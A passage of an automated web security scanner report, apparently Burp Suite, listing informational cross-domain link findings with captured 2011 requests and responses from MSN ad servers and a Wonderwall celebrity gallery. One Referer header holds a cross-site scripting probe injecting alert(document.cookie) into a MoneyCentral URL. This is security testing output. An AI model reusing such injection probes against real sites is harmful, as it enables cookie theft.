<div class="leftNav_content"><img class="leftNav_bg" src="http://entimg.s-msn.com/i/grandprix/leftNavBg.gif" style="border-width:0px;" /><div class="MoviesleftNav_linkDiv">
...[SNIP]...
<span class="leftNav_disabled"><img src='http://entimg.s-msn.com/i/grandprix/leftNavSeperator.gif' /></span>
...[SNIP]...
<a title="TV News" href="http://tv.redacted/rss/toptvnews"> <img src='http://entimg.s-msn.com/i/ms/RssIcon.gif' style='border-width:0px;' class='NewsRssIconClass'/></a>
...[SNIP]...
<div class="ArticleImageDivCss"> <img title="..AP Photo/Chris Pizzello, File" src="http://entimg.s-msn.com/i/150/News/May10/Charlie_Sheen_150.jpg" alt="Charlie Sheen" style="height:200px;width:150px;border-width:0px;" /><div class="ArticleCaptionCss">
...[SNIP]...
<P>LOS ANGELES (AP) -- The production of <a href=http://www.bing.com/search?q=Charlie+Sheen&amp;form=msnena class="art">Charlie Sheen</a>
...[SNIP]...
</STRONG> <a href=http://www.bing.com/search?q=charlie+sheen%27s+woes&amp;form=msnena class="art">Charlie Sheen's recent woes</a>
...[SNIP]...
<div class="newsToolBarCommentsIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/discuss.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="newsToolBarMailIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/mail.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="newsToolBarDiggIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/Digg.gif" style="border-width:0px;" /></div>
...[SNIP]...
</style><a href='http://www.facebook.com/share.php?u=http%3a%2f%2ftv.redacted%2ftv%2farticle.aspx%3fnews%3d625552%26affid%3dfb' onclick='return fbs_click()' target='_blank' class='fb_share_link'>Facebook</a>
...[SNIP]...
<div class="newsToolBarSpacesIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/spacesBlog.gif" style="border-width:0px;" /></div>
...[SNIP]...
<a title="RSS for &quot;More TV News&quot;" href="/rss/toptvnews"><img src="http://entimg.s-msn.com/i/ms/RssIcon.gif" style="border-width:0px;" /></a>
...[SNIP]...
<a title="RSS for &quot;Just In News&quot;" href="/rss/entnews"><img src="http://entimg.s-msn.com/i/ms/RssIcon.gif" style="border-width:0px;" /></a>
...[SNIP]...
<td class="adText"><a href="http://choice.live.com/default.aspx"><img src="http://blstc.redacted/br/chan/css/decoration/adchoicesv4.png"/>
...[SNIP]...
<td class="adText"><a href="http://choice.live.com/default.aspx"><img src="http://blstc.redacted/br/chan/css/decoration/adchoicesv4.png"/>
...[SNIP]...
<TD class=rp5 width=75 align=left><a href="http://www.bing.com/videos/browse/Sundance?ocid=sdnews " class="altlink"><IMG border=0 alt=Bing src="http://entimg.msn.com/i/140/ent/bingbar_140.jpg" width=140 height=101>
...[SNIP]...
<STRONG><a href="http://www.bing.com/videos/browse/Sundance?ocid=sdnews " class="altlink">Sundance 2011</a>
...[SNIP]...
<div class="pageFooter_link"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_new">MSN Privacy</a>
...[SNIP]...
<div class="pageFooter_logo"><img id="microsoftLogo" src="http://entimg.s-msn.com/i/ms/ms_logo.gif" style="border-width:0px;" /></div>
...[SNIP]...
<noscript><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<!-- start Vibrant Media IntelliTXT script section --><script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...
</script><img id="clickTarget" style="display:none" src="http://entimg.s-msn.com/i/sp.gif" onReadyStateChange="if(SF('ctStateChange')) ctStateChange();" alt="" ></object>
...[SNIP]...

22.352. http://redcated/CNT/iview/286609711/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/286609711/direct

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\ HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7206
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 17:39:02 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-w
...[SNIP]...
<noscript>
<a target="_blank" href="http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\http://clk.redcated/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.1/01"><img border="0" src="HTTP://spe.redcated/ds/CJCNTCINGCP9/1_5_2010_customertargeting/110109_22_UTV_THDVR_29_100B_NOTAG_300x250.jpg?ver=1" width="300" height="250" />
...[SNIP]...
</noscript>
<script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script44.js?agnc=607671&cmp=CINGCP913401CNT&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=286609711&advid=607930&sid=286609711&adid="></script><img src="http://t.mookie1.com/t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=198086410&migRandom=141989623&migTagDesc=Cingular&migAtlSA=286609711&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc" width="0" height="0" border="0" /></body>
...[SNIP]...

22.353. http://redcated/CNT/iview/286609711/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/286609711/direct

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7201
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:29:43 GMT

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-w
...[SNIP]...
<noscript>
<a target="_blank" href="http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=http://clk.redcated/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.1/01"><img border="0" src="HTTP://spe.redcated/ds/CJCNTCINGCP9/1_5_2010_customertargeting/110109_22_UTV_THDVR_29_100B_NOTAG_300x250.jpg?ver=1" width="300" height="250" />
...[SNIP]...
</noscript>
<script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script44.js?agnc=607671&cmp=CINGCP913401CNT&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=286609711&advid=607930&sid=286609711&adid="></script><img src="http://t.mookie1.com/t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=198086410&migRandom=384130361&migTagDesc=Cingular&migAtlSA=286609711&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc" width="0" height="0" border="0" /></body>
...[SNIP]...

22.354. http://redcated/CNT/iview/286609711/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/286609711/direct

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\ HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7206
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:51:41 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-w
...[SNIP]...
<noscript>
<a target="_blank" href="http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\http://clk.redcated/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.1/01"><img border="0" src="HTTP://spe.redcated/ds/CJCNTCINGCP9/1_5_2010_customertargeting/110109_22_UTV_THDVR_29_100B_NOTAG_300x250.jpg?ver=1" width="300" height="250" />
...[SNIP]...
</noscript>
<script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script44.js?agnc=607671&cmp=CINGCP913401CNT&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=286609711&advid=607930&sid=286609711&adid="></script><img src="http://t.mookie1.com/t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=198086410&migRandom=988724102&migTagDesc=Cingular&migAtlSA=286609711&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc" width="0" height="0" border="0" /></body>
...[SNIP]...

22.355. http://redcated/CNT/iview/286609711/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/286609711/direct

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\ HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7206
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 03:04:25 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-w
...[SNIP]...
<noscript>
<a target="_blank" href="http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\http://clk.redcated/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.1/01"><img border="0" src="HTTP://spe.redcated/ds/CJCNTCINGCP9/1_5_2010_customertargeting/110109_22_UTV_THDVR_29_100B_NOTAG_300x250.jpg?ver=1" width="300" height="250" />
...[SNIP]...
</noscript>
<script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script44.js?agnc=607671&cmp=CINGCP913401CNT&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=286609711&advid=607930&sid=286609711&adid="></script><img src="http://t.mookie1.com/t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=198086410&migRandom=299924493&migTagDesc=Cingular&migAtlSA=286609711&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc" width="0" height="0" border="0" /></body>
...[SNIP]...

22.356. http://redcated/CNT/iview/286609711/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/286609711/direct

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /CNT/iview/286609711/direct;wi.300;hi.250/direct/01/181503410?click=http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\ HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7206
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 18:56:29 GMT
Connection: close

<html><head><title>110109_22_UTV_THDVR_29_100B_NOTAG_300x250</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-w
...[SNIP]...
<noscript>
<a target="_blank" href="http://atl.whitepages.com/adclick/CID=0000ed08b2c762f700000000/relocate=\http://clk.redcated/go/286609711/direct;wi.300;hi.250;ai.198086410;ct.1/01"><img border="0" src="HTTP://spe.redcated/ds/CJCNTCINGCP9/1_5_2010_customertargeting/110109_22_UTV_THDVR_29_100B_NOTAG_300x250.jpg?ver=1" width="300" height="250" />
...[SNIP]...
</noscript>
<script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script44.js?agnc=607671&cmp=CINGCP913401CNT&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=286609711&advid=607930&sid=286609711&adid="></script><img src="http://t.mookie1.com/t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=198086410&migRandom=266574726&migTagDesc=Cingular&migAtlSA=286609711&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc" width="0" height="0" border="0" /></body>
...[SNIP]...

22.357. http://redcated/CNT/iview/287065754/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redcated
Path:   /CNT/iview/287065754/direct

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /CNT/iview/287065754/direct;pc.106032482;wi.160;hi.600/01?click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6730
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:30:51 GMT

<html><head><title>FreePhone_TestEvergreen_160x600_011811</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-widt
...[SNIP]...
</noscript>
<script type="text/javascript" language="javascript" src="http://cdn.doubleverify.com/script44.js?agnc=607671&cmp=CINGCIN14201CNT&crt=&crtname=&adnet=&dvtagver=3.3.1346.2176&adsrv=2&plc=287065754&advid=607929&sid=287065754&adid="></script>
...[SNIP]...

22.358. http://redcated/DEN/jview/286026710/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redcated
Path:   /DEN/jview/286026710/direct

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /DEN/jview/286026710/direct;;vt.1/01?buster_url=&pub_view_url=&click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6434
Content-Type: text/javascript
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 01:21:02 GMT

document.write("<meta HTTP-EQUIV='expires' CONTENT='0'></meta>");
document.write("<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'></meta>");

   
var nRequiredVersion = 9;
var bIsRightVersion = fal
...[SNIP]...

if(bIsRightVersion)
{
   var strFQDN = "HTTP://spe.redcated/ds/DEDENBARCISA/";
var index = strFQDN.indexOf("/ds/");
strFQDN = strFQDN.substring(0, index);
_strContentISA1292630112506 = '' + '<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="HTTP://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" id="idSWFISA1292630112506" width="160" height="600">'
+ '<param name="movie" value="HTTP://spe.atdmt.com/ds/DEDENBARCISA/ISHN1350_ETFcenter_160x600.swf?" />
...[SNIP]...

22.359. http://redcated/NYC/iview/264935949/direct

Summary

Severity:   Information
Confidence:   Certain
Host:   http://redcated
Path:   /NYC/iview/264935949/direct

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /NYC/iview/264935949/direct;;wi.300;hi.250/01?click= HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://moneycentral.msn.com/investor/charts/chartdl.aspx?symbol=indu22b72%22;alert(document.cookie)//2badde9cef5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1294100002-3786607; MUID=DC63BAA44C3843F38378B4BB213E0A6F

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 6554
Content-Type: text/html
Expires: 0
Connection: close
Date: Sun, 30 Jan 2011 13:00:29 GMT

<html>
<head>
<title>BND_Coffee2_FL_300x250_MSN_IFR.tpl</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head>
<body style="border-wi
...[SNIP]...
</noscript>
<script src="http://core.insightexpressai.com/adServer/adServerESI.aspx?bannerID=166700&siteID=264935949&creativeID=197994882"></script>
<img src="http://citi.bridgetrack.com/event/?type=-1&BTData=C02177F736E617E5C504A43B1BEBEA9AD95978492FFF7F6EFEAC5C2DEF029DB7&BT_PUB=2&BT_VEN=2331&BT_TRF=26638&r=[RANDOM]" width=1 height=1 border=0>
</body>
...[SNIP]...

22.360. http://wonderwall.redacted/movies/celeb-inc-for-jan-28-11106.gallery

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wonderwall.redacted
Path:   /movies/celeb-inc-for-jan-28-11106.gallery

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /movies/celeb-inc-for-jan-28-11106.gallery?gt1=28135 HTTP/1.1
Host: wonderwall.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 23:51:47 GMT
Expires:
Pragma:
Cache-Control: public
Cache-Control: max-age=300
Vary: Accept-Encoding
Content-Type: text/html
X-Cache-Lookup: HIT from localhost:8080
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if lt IE 7]> <html class="ie ie6 lte9 lte8 lte7" xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
<meta name="medium" content="image" />
<link rel="image_src" href="http://static.wonderwall.com/photos/Original/45288_Original.jpg" />

<meta property="fb:app_id" content="111376106992" />
<script type="text/javascript" src="http://amch.questionmarket.com/adsc/d840549/13/842134/randm.js"></script>
...[SNIP]...
</script>
<script src="http://yui.yahooapis.com/3.2.0/build/yui/yui-min.js" type="text/javascript"></script>
...[SNIP]...
</script>

<link rel="stylesheet" type="text/css" href="http://static.wonderwall.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.css" />
<link rel="stylesheet" type="text/css" href="http://static.wonderwall.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.css" />
<link rel="stylesheet" media="only screen and (max-device-width: 480px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
<link rel="stylesheet" media="only screen and (min-device-width: 481px) and (max-device-width: 1024px)" href="http://static.wonderwall.com/cache/css/1285028347/aXBhZC5jc3M..css" />
</head>
...[SNIP]...
<span><img src="http://static.wonderwall.com/photos/Original/45288_Original.jpg" class="imgSrc-http://static.wonderwall.com/photos/Original/45288_Original.jpg" alt="By Michelle LanzMaking it in the competitive world of showbiz takes a lot more than talent these days; you need a recognizable name, a diversified brand and shameless self-promotion. Click through to see which celebs are selling products and selling out this season. They already have their famous name on books, perfumes, TV shows and even their own credit card, but now the Kardashian sisters are venturing into the lucrative business of Silly Bandz. Yep, now you can get your wrists on these trendy plastic bracelets with shapes that include shoes, perfumes, the letter K and even silhouettes of the girls. And yes, Khloe's band is slightly taller than the others. Hey those Silly Bandz manufacturers sure are sticklers for accuracy.RELATED: Celebs Who Need an Exorcism" /></span>
...[SNIP]...
<P ALIGN="LEFT">They already have their famous name on books, perfumes, TV shows and even their own credit card, but now the Kardashian sisters are venturing into the lucrative business of <A HREF="http://www.buzzfeed.com/ashleybaccam/kardashian-silly-bandz" TARGET="_blank">Silly Bandz</A>
...[SNIP]...
<li class="shareItem shareItem-twitter"><a href="http://twitter.com/share?original_referer=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288%26ocid%3Dtwtr-utweet" class="twitterProxy"></a>
...[SNIP]...
<li class="shareItem shareItem-windowsLive first"><a href="https://favorites.live.com/quickadd.aspx?url=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288" target="_blank">Windows Live</a>
...[SNIP]...
<li class="shareItem shareItem-delicious"><a href="http://del.icio.us/post?title=sillybandz&url=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288" target="_blank">Delicious</a></li><li class="shareItem shareItem-myspace"><a href="http://www.myspace.com/Modules/PostTo/Pages/?l=3t=sillybandz&u=http%3A%2F%2Fwonderwall.msn.com%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288" target="_blank">MySpace</a></li><li class="shareItem shareItem-digg"><a href="http://digg.com/submit?phase=2title=sillybandz&url=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288" target="_blank">Digg</a></li><li class="shareItem shareItem-mixx"><a href="http://www.mixx.com/submit?page_url=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288" target="_blank">Mixx</a></li><li class="shareItem shareItem-reddit last"><a href="http://reddit.com/submit?title=sillybandz&url=http%3A%2F%2Fwonderwall.redacted%2Fmovies%2Fceleb-inc-for-jan-28-11106.gallery%3FphotoId%3D45288" target="_blank">Reddit</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15894_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/michaelianblack">michaelianblack</a>: <a href="http://twitter.com/BrianLynch">@BrianLynch</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/michaelianblack/statuses/31490865776037888">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/41323_Module1x1_634261162153428902.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/emmyrossum">emmyrossum</a>: Day off today, <a href="http://twitter.com/emmarosekenney">@emmarosekenney</a> and I hit up <a href="http://twitter.com/dovetailchicago">@dovetailchicago</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/emmyrossum/statuses/31490256649850880">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15894_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/michaelianblack">michaelianblack</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/michaelianblack/statuses/31488824462811136">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rihanna">rihanna</a>: <a href="http://twitter.com/__shelovesB">@__shelovesB</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rihanna/statuses/31485881311297536">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/15298_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/csiriano">csiriano</a>: Important! Various ticket websites are selling fake tickets to my fashion show. I wish everyone who wanted to (cont) <a href="http://tl.gd/8fkbn3">http://tl.gd/8fkbn3</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/csiriano/statuses/31485259056943104">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rihanna">rihanna</a>: #puppyNAVY ? RT <a href="http://twitter.com/RicardoFenty">@RicardoFenty</a>: #DogNavy <a href="http://twitpic.com/3kde2c">http://twitpic.com/3kde2c</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rihanna/statuses/31484086254051328">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/27217_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rihanna">rihanna</a>: <a href="http://twitter.com/StevenGParry">@StevenGParry</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rihanna/statuses/31482886624378880">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/9389_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/PerezHilton">PerezHilton</a>: <a href="http://twitter.com/PaulaAbdul">@PaulaAbdul</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/PerezHilton/statuses/31481637023784960">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/8376_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/BowWow">BowWow</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/BowWow/statuses/31481112115019776">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/25615_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/DJPaulyD">DJPaulyD</a>: RT <a href="http://twitter.com/izzy_kardashian">@izzy_kardashian</a>: "I beat that beat up, call it self defense" you know you've made it when Lil Wayne quotes you in a song - <a href="http://twitter.com/DJPaulyD">@DJPaulyD</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/DJPaulyD/statuses/31480933047603200">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7503_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/AubreyODay">AubreyODay</a>: LOVE emotional tweets, awe xoxo! "<a href="http://twitter.com/2RQ">@2RQ</a>: <a href="http://twitter.com/AubreyODay">@AubreyODay</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/AubreyODay/statuses/31478843529232385">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/1226_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/llcoolj">llcoolj</a>: <a href="http://twitter.com/ashleeRocs">@ashleeRocs</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/llcoolj/statuses/31477242445959168">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7503_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/AubreyODay">AubreyODay</a>: Me shooting with the great <a href="http://twitter.com/avoyermagyan">@avoyermagyan</a> <a href="http://twitter.com/traverrains">@traverrains</a> <a href="http://twitter.com/kurumiuchino">@kurumiuchino</a>! <a href="http://twitpic.com/3umrxp">http://twitpic.com/3umrxp</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/AubreyODay/statuses/31475592251580417">Twitter</a>
...[SNIP]...
</b>
<img src="http://static.wonderwall.com/photos/Module1x1/7877_Module1x1.jpg" height="50" width="50" alt="" />
</span>
...[SNIP]...
<p>
<a href="http://twitter.com/rainnwilson">rainnwilson</a>
...[SNIP]...
<span class="source"> via <a href="http://twitter.com/rainnwilson/statuses/31475437494345729">Twitter</a>
...[SNIP]...
</b>
